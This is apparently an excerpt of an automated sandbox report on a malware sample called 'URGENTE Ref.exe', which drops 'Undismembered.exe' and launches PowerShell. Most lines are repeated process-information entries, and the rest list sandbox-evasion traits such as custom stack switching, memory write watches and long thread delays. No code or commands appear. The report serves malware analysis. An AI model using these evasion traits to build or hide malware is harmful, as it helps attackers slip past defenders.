          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeAPI/Special instruction interceptor: Address: 2F3CCF0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeMemory allocated: 20580000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeMemory allocated: 20030000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599647Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599532Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599407Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599282Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599157Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 599032Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598813Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598688Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598563Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597969Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596491Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596368Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6555Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3106Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeWindow / User API: threadDelayed 1695Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeWindow / User API: threadDelayed 8120Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -35048813740048126s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8084Thread sleep count: 1695 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8084Thread sleep count: 8120 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599647s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599532s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599407s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599282s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599157s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -599032s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598813s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598688s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598563s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598438s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598313s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -598094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597969s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597235s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -597110s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596985s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080Thread sleep time: -596610s >= -30000sJump to behavior
